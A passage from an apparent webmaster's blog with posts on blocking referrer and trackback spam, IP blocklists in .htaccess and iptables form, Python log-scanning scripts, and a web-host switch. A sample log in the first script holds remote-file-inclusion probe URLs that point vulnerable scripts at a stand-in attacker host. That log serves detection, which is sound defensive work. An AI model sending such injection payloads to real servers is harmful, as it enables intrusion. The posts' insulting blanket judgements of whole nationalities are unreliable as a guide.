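    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) .*"(?P<ua>[^"]*)"$'
)

# The exact, unadorned UA the posts block; real browsers send a much longer string.
BARE_UA = "Mozilla/5.0"

SAMPLE_LOG = """\
70.85.136.34 - - [12/Nov/2009:06:30:02 -0800] "GET //modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://attacker.example//audio/swf?? HTTP/1.1" 403 137 "-" "Mozilla/5.0"
212.241.182.240 - - [01/Feb/2009:02:44:23 -0800] "GET /?sIncPath=http://attacker.example/mail/id1.txt?? HTTP/1.1" 403 137 "-" "Mozilla/5.0"
192.0.2.10 - - [01/Feb/2009:09:15:00 -0800] "GET /login.php?next=/account HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1) Gecko/20091102 Firefox/3.5.5"
192.0.2.11 - - [01/Feb/2009:09:16:00 -0800] "GET /redirect.php?url=http://www.example.com/ HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1) Gecko/20091102 Firefox/3.5.5"
"""


def remote_parameters(target):
    """(name, value) pairs in the query string whose decoded value is a remote URL."""
    query = target.partition("?")[2]
    return [(k, v) for k, v in parse_qsl(query, keep_blank_values=True)
            if re.match(r'(https?|ftp)://', v, re.I)]


def scan_log(text):
    """One finding per request.

    'blocked_by_rule' is what the blanket RewriteCond above would reject;
    'probe' additionally requires an attacker tell: a trailing '?' on the URL
    (which turns whatever the vulnerable script appends into a harmless query
    string for the attacker's server) or the bare Mozilla/5.0 agent.
    Comparing the two fields over a real log shows what the rule would cost.
    """
    findings = []
    for line in text.splitlines():
        m = REQ_RE.search(line)
        if not m:
            continue
        target, ua = m.group("target"), m.group("ua")
        remote = remote_parameters(target)
        trailing_mark = any(v.endswith("?") for _, v in remote)
        findings.append({
            "target": target,
            "status": m.group("status"),
            "remote_params": remote,
            "blocked_by_rule": bool(QUERY_RFI_PATTERN.search(target.partition("?")[2])),
            "probe": bool(remote) and (trailing_mark or ua == BARE_UA),
        })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["probe"], f["blocked_by_rule"], f["target"])
```

Two caveats before turning the RewriteCond on: the fourth sample line shows that any legitimate script of yours that accepts a URL parameter (a redirect or "go to" page) would be blocked along with the probes, so grep your log for false positives first; and the Apache rule matches the raw query string, so a probe that percent-encodes the scheme (for example %68ttp://) slips past it, which is why remote_parameters decodes the query before testing.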

Continue reading "Block server script injection exploits targeting your websites" »

November 24, 2008

Wizcrafts has a new web host: LunarPages

After having my websites hosted by Bluehost for two years I have had to make a business decision and change web hosting companies. Note, this decision was based solely on price, not any problems with the service. My web hosting renewal date is fast approaching and as it turns out the cost of renewing my annual hosting contract had gone up, rather than down. Despite contacting the sales department at Bluehost they were unwilling to negotiate with me, so I looked around for a while and decided to switch my websites to LunarPages, on their Basic hosting package. Instead of having to pay out almost $108 for another year at Bluehost, I am paying just under $60 to LunarPages; almost half the annual price! Normally, this hosting would cost $6.95 a month (still $2.00/month cheaper than Bluehost's 1 year renewal rate), but I got this deal because LunarPages is running a Fall Special rate of only $4.95 per month, annually, for new accounts. In these tough economic times I had to get the best price, along with excellent service, and that's what LunarPages offers.

Let's get to the specifics and compare LunarPages hosting to Bluehost. Both now offer unlimited disk space and data transfer (a.k.a. "Bandwidth"). If I had had to rewrite my entire website to accommodate the new host I wouldn't have made the change, even to save the $48.00. But, I didn't have to change a single script, or file location. Everything works on LunarPages exactly the same as it did on Bluehost! There is a slight difference between the cPanel features on LunarPages, but nothing monumental and nothing I require for normal operation. In fact, get this, after recreating just the POP3 email accounts, using the "Backup" icon on both cPanels, I was able to export my email forwarding accounts and spam filters from Bluehost to G-zipped files on my computer, then import those same files into my new account on LunarPages, and voila, my 50+ email forwarding (alias) accounts and custom mail filters were loaded and ready to go! Uploading all of my website files and folders took a bit of time (at about 40 KB/sec. max.), but went smoothly and flawlessly. In all there was just under a gigabyte uploaded to the new server. Then, I recreated the database and super-user for my MovableType blog, exported the database from Bluehost, imported it into LunarPages (using the Backup page icon), and Bam, there was my blog! Then I went back into cPanel and entered my "add-on" domains and they became separate websites. My parked domains similarly became parked on my main site at LunarPages, just like they were on BlueHost.

I am an activist Webmaster and spam fighter and I don't tolerate log or blog spammers at all. I have developed some really advanced spam and exploit detection and blocking rules that I apply in my .htaccess files and all of those rules work exactly the same on LunarPages as they did on BlueHost. These rules include certain ip based blocklists that I publish for others to use to protect their websites from spammers, scammers and exploiters in various unfriendly countries. Each blocklist is available in both .htaccess and iptables formats. If you have an Apache server based website and are being troubled by Exploited Servers, Nigerian scammers, Russian spammers, or Chinese hackers, take a look at my .htaccess, or iptables blocklists.

I use a CGI hit counter and run the counter script in a special directory, not the cgi-bin. Both Bluehost and LunarPages allow CGI scripts to run in any directory you want, once you chmod the Perl scripts to 755. "XBitHack Full" in .htaccess also works on LunarPages, provided you set the owner execute bit on the HTML files that carry server-side includes (e.g. mode 744).

LunarPages supplies a means of accessing your website before it goes live, so I was able to test all functions to make sure I hadn't forgotten anything. Of course I did forget to chmod a few miscellaneous executable files, which took a couple of minutes to locate and correct. After everything tested correctly I logged into Dotster, my domain registrar, where I changed the primary and secondary name servers from Bluehost to LunarPages. To tell at a glance which host was serving my pages, I changed the last-modified date in the JavaScript include file used in the footer of every page and uploaded that only to LunarPages, leaving the old date in place on Bluehost. Within a half hour my website was loading from LunarPages, showing the new last-modified date! It took two days for the DNS change to propagate throughout the Internet, after which the entire world was seeing my new web host location. I left the files up on Bluehost for the last few stragglers that were still being routed there. They can serve as an emergency backup mirror, in case LunarPages were to suffer an outage before my Bluehost account expires next month.

Unlimited storage and bandwidth for $4.95/mo!
That's pretty much it. I am totally satisfied with my decision to make the switch to LunarPages as my website hosting company. I still get all of my mail, to all of the accounts I had before. All forwarding accounts work, as do the site-wide cPanel spam filters I wrote. My CGI scripts do what they are supposed to do, the counters count, the includes are included. The only thing that is really different is that I am paying almost half the price for the same features, with the same 99.9% uptime guarantee. Don't let anybody fool you about uptime; every shared hosting server will eventually suffer downtime, for any number of reasons. Sometimes the server I was on went dark due to the failure of the RAID cards, sometimes due to CPU overload, or due to DDoS attacks on one of the hundreds of websites hosted on that server. Shit happens! I can't afford to pay for dedicated hosting for my websites, so I accept a little downtime here and there. Time will tell if LunarPages servers are any more resilient than Bluehost's servers. If not, I will certainly let y'all know about it on my blog.

I wrote a web page describing the LunarPages hosting packages and features of the Basic hosting account and invite you to read it. Right now they are still running the Fall Special price of only $4.95 per month, for one or two year contracts. If you need a new hosting company and want to save money, but still get real telephone support, please give them a try. They have a 30 day full money back guarantee if you aren't satisfied. I had one chance to call support with a question about the server I was on. The phone was answered by an automated routing machine. I pressed the key to route to technical support and somebody in the USA picked up the phone after two rings. Just call 1-877-LUNARPAGES if you need phone support for USA and Canada. For the United Kingdom, call 0800-072-9150 instead. If you live outside of these countries, you cannot dial the toll free number. They provide another support line for their international customers: 1-714-521-8150.

Get Norton 360 Version 4.0 - All-In-One Security. If you have a non-current version of a Symantec security program and wish to renew your definition updates subscription, or upgrade to a new version at a discount, go to the Norton Product Upgrades & Renewals page.

November 8, 2008

.htaccess blocklist addition for prolific access log spammer

Today I reviewed the daily access log for this website and discovered a large number of repeated attempts to spam my access log, all coming from the IP address 64.182.124.212. The spam consisted of forged Referer-field entries advertising a medical search engine and a social networking and dating website. Referrer spam only pays off for the spammer when a site publishes its raw logs or referrer statistics somewhere a search engine can index them, which is why the same bogus referrer gets sent over and over.

The IP address 64.182.124.212 belongs to a web hosting company known as CI Host and is assigned to hosting customer PacificAir.com, an amateur-looking website. The spamvertised websites in the Referer field look just as amateurish as the PacificAir website and are hosted on the same server. The IP range assigned to CI Host is 64.182.0.0 through 64.182.255.255, or in CIDR notation 64.182.0.0/16.

The way I respond to attempts to spam my access logs is to place the offending IP address, and/or the CIDR of its hosting company, on my published IP blocklists. I did just that, placing the CIDR 64.182.0.0/16 on my Exploited Servers Blocklist. If you are getting spammed from the IP address 64.182.124.212 and want to block it in the .htaccess file of your Apache-hosted website, add one of the following rules inside a section labeled <Files *>:

<Files *>
order deny,allow
deny from 64.182.124.212
</Files>

If, like me, you decide to block the entire ISP/web hosting company, use this rule:

<Files *>
order deny,allow
deny from 64.182.0.0/16
</Files>
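The two rules above are the whole technique: with "order deny,allow" Apache evaluates the deny list first and lets every other client through. As an added example (not wizcrafts.net's own tooling, which this page does not show), here is a small Python script that takes one list of addresses and CIDRs, validates every entry, collapses overlaps such as 64.182.124.212 sitting inside 64.182.0.0/16, and emits both the .htaccess form used here and an iptables form, since the blocklists on this site are published in both formats. The sample entries, the documentation-range addresses 192.0.2.0/25 and 192.0.2.128/25, and the shape of the iptables rule (one DROP per range on the INPUT chain) are assumptions. Note also that Order/Deny is Apache 2.2 syntax; Apache 2.4 only honors it when mod_access_compat is loaded, and the native 2.4 equivalent is "Require not ip" inside a <RequireAll> block.

```python
"""Build the .htaccess and iptables forms of an IP blocklist from one list of
addresses and CIDRs.

Added example; it is not the generator used for the blocklists on
wizcrafts.net (assumption: that tooling is not shown on this page).  Every
entry is validated and overlapping ranges are merged before anything is
written out, so a typo cannot take the site down with a 500 error and a
single address is not listed redundantly inside a /16 that already covers it.
"""
import ipaddress

# Constructed sample input: two entries from the Nov 2008 post above, two
# adjacent documentation-range halves that should merge, and one malformed
# entry that must be rejected rather than written into .htaccess.
SAMPLE_ENTRIES = [
    "64.182.124.212",    # the CI Host customer spamming the Referer field
    "64.182.0.0/16",     # CI Host's whole allocation (already covers the above)
    "192.0.2.0/25",      # constructed: lower half of 192.0.2.0/24
    "192.0.2.128/25",    # constructed: upper half, adjacent to the one above
    "203.0.113.300",     # constructed: octet out of range
]


def parse_entries(entries):
    """Return (valid_networks, rejected_entries).

    Single addresses become /32 networks.  Text after '#' is a comment, as in
    the blocklist files on this site.  Entries with host bits set under the
    mask (e.g. 64.120.5.13/24) are rejected rather than silently widened,
    because that almost always means the mask is a typo."""
    networks, rejected = [], []
    for raw in entries:
        text = raw.split("#", 1)[0].strip()
        if not text:
            continue
        try:
            networks.append(ipaddress.ip_network(text, strict=True))
        except ValueError:
            rejected.append(raw)
    return networks, rejected


def collapse(networks):
    """Merge adjacent ranges and drop any range contained in a wider one."""
    merged = []
    for family in (4, 6):
        same = [n for n in networks if n.version == family]
        if same:
            merged.extend(ipaddress.collapse_addresses(same))
    return merged


def to_htaccess(networks):
    """Apache 2.2 mod_authz_host syntax, as used on this page."""
    lines = ["<Files *>", "order deny,allow"]
    for n in networks:
        if n.prefixlen == n.max_prefixlen:          # a single host: no /32 needed
            lines.append(f"deny from {n.network_address}")
        else:
            lines.append(f"deny from {n.with_prefixlen}")
    lines.append("</Files>")
    return "\n".join(lines) + "\n"


def to_iptables(networks, chain="INPUT"):
    """One DROP rule per range.  Assumption: the site's own iptables files may
    use a different chain or target."""
    return "".join(f"iptables -A {chain} -s {n.with_prefixlen} -j DROP\n" for n in networks)


def build(entries):
    """Validate, collapse, and render both output formats."""
    networks, rejected = parse_entries(entries)
    merged = collapse(networks)
    return {
        "networks": merged,
        "rejected": rejected,
        "htaccess": to_htaccess(merged),
        "iptables": to_iptables(merged),
    }


if __name__ == "__main__":
    result = build(SAMPLE_ENTRIES)
    print(result["htaccess"])
    print(result["iptables"])
    for bad in result["rejected"]:
        print("rejected entry:", bad)
```

Running it prints a <Files *> block containing only 64.182.0.0/16 and 192.0.2.0/24, the matching iptables lines, and a rejection notice for the malformed entry; the rejected list is what you want to review before uploading, because an invalid directive in .htaccess is exactly what produces the site-wide 500 error warned about elsewhere on this page.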

NOTE:
If you have your website hosted by CI Host please read the warning in my extended comments!



July 7, 2008

Stupid Russian Blog Spammers Still Wasting Their Time

"Stupid Russian Blog Spammers Still Wasting Their Time" makes for a catchy, surreal title, but it's true. The same country that produced the brilliant criminal masterminds behind the Storm and Grisbi worms has also produced some of the stupidest blog spammers ever to set finger to keyboard!

Let me explain what I am referring to regarding stupid blog spammers. First, look in the upper right corner of this blog, just under the Google search field. Here's what it says, in capital letters: "SORRY: NO COMMENTS, NO TRACKBACKS!" That should be self-explanatory to almost anybody who can read English, including people intent on spamming a blog such as this one using English words. You know the crap I'm talking about: links to buy unlicensed or illegal drugs or herbal solutions to cure "ED" or enlarge one's "natural size." When I first started this blog I did allow trackbacks and comments, and that is what I was getting submitted, all in English and all traced to Russian and Ukrainian IP addresses.

As soon as I realized that only blog spammers were trying to comment on my blog, I decided to disable the code and modules that allowed comments and trackbacks. Still, these idiots in Russia and the Ukraine continued trying to POST comments and trackbacks to the now-disabled modules that used to handle those functions. This led me to write three articles about these incidents during the spring and summer of 2007. Their titles, with links, are as follows:


  1. Stupid Blog Trackback Spammers Don't Understand Server 403 Responses

  2. Russian and Ukrainian Blog Spammers are STUPID!

  3. Blog spammers still wasting their time trying to spam this unspammable blog


I wrote those articles about a year ago, yet I still see daily access log entries, blocked with server 403 responses, from Russian IP addresses trying to POST spam comments or trackbacks to this blog. It is obvious that these spammers are using scripts, but, being stupid spammers, they don't bother to verify whether those scripts are being allowed to complete their submissions, or check my blog to see if their comments were even posted. I'll bet somebody is paying these idiots to send blog spam for them and they are ripping off the guys with the money. If my blog is any indication of their lack of intelligence, then I am guessing that they are having a similar lack of success trying to spam your blogs. Still, some of their attempts may work on unsecured servers.

Anyway, insults to the enemy aside (it feels good though!), I never see the comments they are typing, just an access log entry containing a 403 Forbidden, or a 302 redirect back to their own websites (lol). My Apache-based, shared-hosting web server is protected with a custom .htaccess file that contains my entire, now-famous "Russian Blocklist!" Many webmasters are using this blocklist to keep Russian and Turkish spammers and hackers from accessing their websites.

If your website or blog is hosted on a shared Apache/Linux web server and you want to block access from IP addresses in the former Soviet Union and Turkey, just download my Russian .htaccess Blocklist and either use it as your new .htaccess file or merge the "deny from" list into your existing .htaccess. Full instructions are included on my .htaccess blocklists landing page and on each blocklist page. The landing page has links to all of my existing .htaccess IP blocklists (Chinese, Nigerian, Russian and Exploited Servers), as well as my iptables Linux firewall blocklist equivalents.

An actual access log entry, and the code you can use to block website access from these people, are in my extended content.



May 22, 2008

Steel Guitar Forum Goes Offline Temporarily


On May 19, 2008, the external RAID hard disk unit powering the popular website The Steel Guitar Forum (SGF) suffered a catastrophic failure, taking the entire website offline. It remains offline as of May 22, 2008, while a new RAID setup is installed and data recovery is attempted. We are hoping to have the server back online as soon as possible, with as little data loss as possible. As many of you already know, I do security for the SGF and act as moderator of the "Computers" section of the forum. I have assisted the owner/administrator, Bobby Lee Quasar, in procuring a suitable replacement.

The Steel Guitar Forum is a (paid) members-only community consisting of over 4000 professional and amateur pedal and non-pedal steel guitarists, located around the world. Most of the world's top steel players are members of this community, where information, techniques and music business discussions take place on a daily basis, as well as the exchange of equipment. For many of these members this website is their primary destination on the Internet and I know that they are missing its presence during this outage. We are doing everything we can to get the SGF back online. In the meantime I recommend that all affected steel guitarists spend some extra time practicing their instruments!

The SGF is back online, as of the afternoon of May 23.
As it turned out, both Western Digital hard disks in the WD MyBook Pro Edition II external RAID enclosure failed at the same time! A mirrored pair inside one enclosure shares a controller and a power supply, so it protects against a single bad disk and nothing else; it is not a substitute for a backup kept on a separate device.


March 24, 2008

Russian connection to user agent "WordPress/2.1.1" in website access logs

I read the access logs for my website every day and sometimes I see something that jumps out and grabs my attention as not right. This month, that something is a bunch of attempts to grab various pages on my blog in an unusual manner, with a very unusual user agent: WordPress/2.1.1

At first I thought that somebody was just trying to pick up my MovableType RSS feed, but that is not what they are after. So I did a little research on "WordPress/2.1.1" and learned that it is the release of the popular WordPress PHP blogging software whose download archive was found to have been backdoored by a hacker; WordPress.org replaced it months ago with version 2.1.2. I suppose there may be some WordPress users who haven't heard that this version was hacked with a backdoor and haven't bothered to check for updates, but the log entries I am seeing are not from a WordPress blog. I decided to do a little investigating, which is something I am good at. So I followed the IP addresses to see whence they came.

What I have learned so far about the visitors who send the user agent "WordPress/2.1.1" is that (A) they arrive with no Referer field, (B) they always try to GET a blog article itself, followed immediately by a HEAD request for it, and (C) they change IP addresses after getting my 403 (Forbidden) response and try again. Rotating IP addresses gets them nowhere, since I am also blocking them by their User-Agent string.

Let's take a look at the access log entries for this user agent (widen or maximize your browser window):

67.228.198.50 - - [02/Mar/2008:00:58:01 -0700] "GET /blogs/2008/02/my_spam_analysis_for_february_18_24_2008.html HTTP/1.1" 403 350 "-" "WordPress/2.1.1"
67.228.198.50 - - [02/Mar/2008:01:04:52 -0700] "HEAD /blogs/2008/02/my_spam_analysis_for_february_11_17_2008.html HTTP/1.1" 403 238 "-" "WordPress/2.1.1"

69.50.177.18 - - [13/Mar/2008:12:06:49 -0600] "GET /blogs/2008/03/2wire_modem_dns_poisoning_attack_returns_to.html HTTP/1.1" 403 351 "-" "WordPress/2.1.1"
69.50.177.18 - - [13/Mar/2008:12:07:14 -0600] "HEAD /blogs/2008/03/2wire_modem_dns_poisoning_attack_returns_to.html HTTP/1.1" 403 238 "-" "WordPress/2.1.1"

83.222.14.129 - - [23/Mar/2008:16:52:57 -0600] "GET /blogs/2008/03/windows_vista_sp1_released_some_driver_probl.html HTTP/1.1" 403 269 "-" "WordPress/2.1.1"
83.222.14.129 - - [23/Mar/2008:16:52:57 -0600] "HEAD /blogs/2008/03/windows_vista_sp1_released_some_driver_probl.html HTTP/1.1" 403 236 "-" "WordPress/2.1.1"

89.108.85.75 - - [23/Mar/2008:16:52:38 -0600] "GET /blogs/2008/03/windows_vista_sp1_released_some_driver_probl.html HTTP/1.1" 403 269 "-" "WordPress/2.1.1"
89.108.85.75 - - [23/Mar/2008:16:53:08 -0600] "HEAD /blogs/2008/03/windows_vista_sp1_released_some_driver_probl.html HTTP/1.1" 403 236 "-" "WordPress/2.1.1"

91.192.116.2 - - [23/Mar/2008:18:56:59 -0600] "GET /blogs/2008/03/windows_vista_sp1_released_some_driver_probl.html HTTP/1.1" 403 269 "-" "WordPress/2.1.1"
91.192.116.2 - - [23/Mar/2008:18:57:14 -0600] "HEAD /blogs/2008/03/windows_vista_sp1_released_some_driver_probl.html HTTP/1.1" 403 236 "-" "WordPress/2.1.1"

216.255.185.178 - - [24/Mar/2008:10:15:07 -0600] "GET /blogs/2008/03/followup_article_about_windows_vista_sp1_rel.html HTTP/1.1" 403 269 "-" "WordPress/2.1.1"
216.255.185.178 - - [24/Mar/2008:10:15:22 -0600] "HEAD /blogs/2008/03/followup_article_about_windows_vista_sp1_rel.html HTTP/1.1" 403 236 "-" "WordPress/2.1.1"

These are definitely not typical access log entries and not something a normal search engine or human visitor would produce. WordPress is blog software that gets installed onto web servers; it is not a browser. A User-Agent string identifies the client software making the request: a browser, a search engine's crawler, or some other robot. Despite the diversity of IP addresses, these visits are not unrelated. Read my extended comments to see where these IP addresses are allocated and my conclusions about their source and probable intent.
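Reading these entries by eye works for a dozen lines; it does not scale to a daily log. As an added example (not the blog's own tooling), here is a Python script that parses Apache combined-format lines like the ones above and tags each client IP with the reasons it looks hostile: an address inside a blocklisted CIDR, a forbidden User-Agent string, the GET-immediately-followed-by-HEAD probe pattern described in this post, and POSTs aimed at MovableType's mt-tb.cgi or mt-comments.cgi handlers, which is the trackback and comment spam discussed in the August 2007 posts further down this page. The blocklist (64.182.0.0/16, from the November 2008 post) and the agent list are assumptions seeded from values on this page, not the published blocklists. The sample log reuses three of the GET/HEAD pairs quoted above and adds three constructed lines: a blocklisted POST to mt-tb.cgi, a benign crawler hit, and a junk line to exercise the parser's error path.

```python
"""Scan Apache combined-format access log lines for the abuse patterns
described on this page: hits from a blocklisted CIDR, the forged
"WordPress/2.1.1" user agent, its GET-then-HEAD probe pairs, and POSTs aimed
at MovableType's comment and trackback scripts.

Added example; it is not the blog's own tooling.  BLOCKED_NETWORKS and
BLOCKED_AGENTS are assumptions seeded from values on this page.
"""
import ipaddress
import re
from collections import defaultdict

# Combined Log Format: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

BLOCKED_NETWORKS = [ipaddress.ip_network("64.182.0.0/16")]  # CI Host, Nov 2008 post
BLOCKED_AGENTS = {"WordPress/2.1.1"}                        # forged agent from this post
SPAM_SCRIPTS = ("/mt-tb.cgi", "/mt-comments.cgi")           # MT trackback/comment handlers

# Sample input: three GET/HEAD pairs quoted in this post, plus three constructed
# lines (a blocklisted POST to mt-tb.cgi, a benign crawler hit, a junk line).
SAMPLE_LOG = """\
67.228.198.50 - - [02/Mar/2008:00:58:01 -0700] "GET /blogs/2008/02/my_spam_analysis_for_february_18_24_2008.html HTTP/1.1" 403 350 "-" "WordPress/2.1.1"
67.228.198.50 - - [02/Mar/2008:01:04:52 -0700] "HEAD /blogs/2008/02/my_spam_analysis_for_february_11_17_2008.html HTTP/1.1" 403 238 "-" "WordPress/2.1.1"
83.222.14.129 - - [23/Mar/2008:16:52:57 -0600] "GET /blogs/2008/03/windows_vista_sp1_released_some_driver_probl.html HTTP/1.1" 403 269 "-" "WordPress/2.1.1"
83.222.14.129 - - [23/Mar/2008:16:52:57 -0600] "HEAD /blogs/2008/03/windows_vista_sp1_released_some_driver_probl.html HTTP/1.1" 403 236 "-" "WordPress/2.1.1"
216.255.185.178 - - [24/Mar/2008:10:15:07 -0600] "GET /blogs/2008/03/followup_article_about_windows_vista_sp1_rel.html HTTP/1.1" 403 269 "-" "WordPress/2.1.1"
216.255.185.178 - - [24/Mar/2008:10:15:22 -0600] "HEAD /blogs/2008/03/followup_article_about_windows_vista_sp1_rel.html HTTP/1.1" 403 236 "-" "WordPress/2.1.1"
64.182.124.212 - - [08/Nov/2008:09:12:33 -0700] "POST /cgi-bin/mt/mt-tb.cgi/18 HTTP/1.0" 403 137 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
66.249.65.1 - - [24/Mar/2008:10:20:00 -0600] "GET /blogs/index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (compatible; Googlebot/2.1)"
this line is not an access log record
"""


def parse_line(line):
    """Return a dict of fields, or None if the line is not in combined format."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def classify(rec):
    """Reasons a single record looks hostile; an empty list means benign."""
    reasons = []
    try:
        ip = ipaddress.ip_address(rec["ip"])
    except ValueError:
        return ["unparseable-address"]
    if any(ip in net for net in BLOCKED_NETWORKS):
        reasons.append("blocklisted-range")
    if rec["ua"] in BLOCKED_AGENTS:
        reasons.append("blocked-user-agent")
    if rec["method"] == "POST" and any(s in rec["path"] for s in SPAM_SCRIPTS):
        reasons.append("mt-spam-post")
    return reasons


def analyze(text):
    """Group records by client IP and collect reasons.  An IP whose GET is
    immediately followed by a HEAD under a blocked agent also gets the
    'get-then-head-probe' tag for the pattern described in this post."""
    per_ip = defaultdict(lambda: {"hits": 0, "reasons": set(), "sequence": []})
    unparsed = 0
    for line in text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        if rec is None:
            unparsed += 1
            continue
        entry = per_ip[rec["ip"]]
        entry["hits"] += 1
        entry["reasons"].update(classify(rec))
        entry["sequence"].append((rec["method"], rec["ua"]))
    for entry in per_ip.values():
        seq = entry["sequence"]
        for (m1, ua1), (m2, ua2) in zip(seq, seq[1:]):
            if m1 == "GET" and m2 == "HEAD" and ua1 == ua2 and ua1 in BLOCKED_AGENTS:
                entry["reasons"].add("get-then-head-probe")
                break
    return dict(per_ip), unparsed


def suspicious_ips(text):
    """Sorted list of client IPs that earned at least one reason."""
    per_ip, _ = analyze(text)
    return sorted(ip for ip, e in per_ip.items() if e["reasons"])


if __name__ == "__main__":
    per_ip, bad = analyze(SAMPLE_LOG)
    for ip, e in sorted(per_ip.items()):
        print(f"{ip:16} hits={e['hits']} reasons={sorted(e['reasons']) or 'none'}")
    print(f"unparsed lines: {bad}")
```

The output lists the three WordPress/2.1.1 probers with both the agent and the probe tag, the CI Host address with the range and trackback-POST tags, the crawler with none, and one unparsed line. The per-IP reason set is what you would feed into a new "deny from" entry or a User-Agent rewrite rule; the unparsed count is worth watching, since a silently skipped line is how log-format changes hide attacks.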



January 28, 2008

Russian & Exploited Servers Blocklist is now two blocklists

Prelude:
For the last couple of years I have been compiling and publishing lists of IP addresses belonging to ISPs and commercially hosted web servers in various parts of the world, from which unwanted spam, scams and server hacking attempts emanate. These lists are compiled in a format recognized by Apache web servers: "deny from" IP address directives (rules) inside a <Files *> section. They include both individual IP addresses and ranges of IPs belonging to web hosts, server farms and ISPs, written in CIDR notation. When a group of these blocked IP addresses and CIDRs is compiled together it becomes a "blocklist," sometimes mislabeled as a "blacklist."

My blocklists can be used in at least two different Apache server configuration files: "httpd.conf" (requires server root access, as on dedicated servers) and ".htaccess" (used on shared hosting accounts). My blocklists are all used in private .htaccess files that go into the web root (e.g. public_html), or individual folders, on an Apache-hosted website. If your web host allows .htaccess overrides on individual websites (the Apache setting that permits deny/allow rules there is AllowOverride Limit, or AllowOverride All) you can use any of my blocklists. Instructions are found on each page, in comments like this:

# Here is a sample comment as used in a .htaccess file.
# The # sign causes Apache to ignore the rest of this line

The Changes:
I can see from reading my Change Detection reports that a lot of webmasters are using my .htaccess blocklists. Those of you who are using my Russia and Exploited Servers Blocklist need to be aware that it has just been split into two new files. One deals only with ISPs and servers located in the former Soviet Union and Turkey; the other deals with exploited servers owned by various web hosts, co-location server farms and data centers in various countries (especially here in the good old USA!). The descriptions of these two blocklists are as follows...

The New Files:
The new Russian Blocklist is now located at www.wizcrafts.net/russian-blocklist.html and it contains IP addresses and CIDRs traced to Russia, the Ukraine, Bulgaria, Romania, Estonia, Latvia and Turkey. I included Turkey in this blocklist because I get tons of spam coming through various ISPs in that country (e.g. Turk Telecom), plus numerous server redirection exploit attempts. Basically, the Russian Blocklist is comprised of ISPs, with some web hosting companies thrown in, which are located in Russia or these other Eastern Bloc countries. Most of the traffic I see from these folks is blog, access log and email spam, with the occasional server exploit attempt against my website. New IP addresses and CIDRs are added to this blocklist as I analyze spam sources, or trace log/blog spam attempts (all unsuccessful, due to my security measures and filters) to countries covered by this file.

The new Exploited Servers Blocklist is located at www.wizcrafts.net/exploited-servers-blocklist.html and contains long "deny from" lists of various types of web hosting and dedicated server companies that run, have run, or might try to run hostile code against my website, or spam my access logs, or bypass my security measures, or try to steal my traffic via proxy services. All of these things are hostile actions and are conducted by criminals and criminal organizations. This blocklist is growing rapidly as I see and trace exploit attempts against my server.

Conclusion:
If you have been using my previous file, russia+exploited-server-blocklist.html, please change your bookmarks to point to one or both of the new files that have replaced it. Here is a list of my current .htaccess blocklists, as of this posting:

Exploited Servers Blocklist | Russian Blocklist | Nigerian Blocklist | Chinese-Korean Blocklist


August 29, 2007

Blog spammers still wasting their time trying to spam this unspammable blog

Sometimes people who you'd think know what they're doing are so completely clueless that it makes me laugh! I am referring to blog spammers: the guys in Russia, the Ukraine, Estonia and other parts of the former Soviet Union who relentlessly pound away at their keyboards, sending comment and trackback spam to every MovableType blog they can locate. They must assume that most of these blogs accept these comments and blindly publish them, because they keep trying to post spam messages to MT blogs, linking back to their spamvertised websites hawking various drugs or pornography.

Well, I for one don't allow any comments or trackbacks on my blog. It says so in plain, bold English and Russian words, at the top-right of every blog page, and in all of my blog search results pages. Look under the Google Search box, at the top right of this page, and you'll plainly see where it says:

SORRY: NO COMMENTS, NO TRACKBACKS
КОММЕНТАРИИ и TRACKBACKS ВЫКЛЮЧЕНЫ и НЕ ИЗДАНЫ! (Russian: "Comments and trackbacks are switched off and not published!")

Now, if I wanted to spam this blog and I read that, I'd move along to an easier target and not waste my time on this one. Yet, when I read my server access logs I see that somebody keeps trying to post comments and trackbacks to specific articles in my archives (all of which get a server 403 response), then tries to search for them on the pages to which they were targeted. However, since I don't want any comments or trackbacks, I have deleted the Perl files that handle them and disabled those functions in my global settings. Heck, I have even stripped all the code referring to trackbacks out of my page templates. Even I can't post a trackback on this blog!

Since these spam comments never reach my blog, when the idiots who try to post them search for them on the target pages, nothing is found matching those spam terms. Boris the Spammer needs to get a life or find less secure targets to pester. Instead, he plugs away fruitlessly on this blog, filling my access logs with all kinds of new IP addresses for me to add to my ever-growing Russian Blocklist.

Countless webmasters are using my Russia+Exploited Servers Blocklist. Most of the IP addresses in the Russian blocklist are gathered from my own raw access logs, from stupid blog spammers who evidently can't read the English or Russian notice that I don't allow comments or trackbacks.

If you have a blog or forum that is getting scammed by Nigerians, or spammed by Russians, one or more of my .htaccess blocklists may help you get rid of these leeches. Note that they only work on Apache web servers, unless your Windows server has an ISAPI_Rewrite module installed by the company leasing the server space to you. You can use my Webmaster Contact page to hire me as a consultant to help keep scammers and spammers off your website.


August 4, 2007

Stupid Blog Trackback Spammers Don't Understand Server 403 Responses

The title of this article tells it all: "Stupid Blog Spammers Don't Understand Server 403 Responses!" Many months ago I discovered that although comments and trackbacks were not being posted to my blog, due to automatic moderation and classification of them as spam, they nonetheless kept on a-comin'. The comment spammers gave up a couple of months ago when they searched my blog only to learn that their bullshit comments had not been posted and never would be (I told them so on the search results page). However, the idiots who are trying to post trackback spam don't bother to search the blogs they are posting to, nor do they apparently read the responses sent by the script they are aimed at. If they did, all they would see from my blog is a steady stream of server 403 responses: "Access Denied!" I don't even have the comments or trackbacks Perl modules installed anymore, so even I can't post comments or trackbacks to my own blog! I removed them when it became obvious that only spammers were commenting or tracking back.

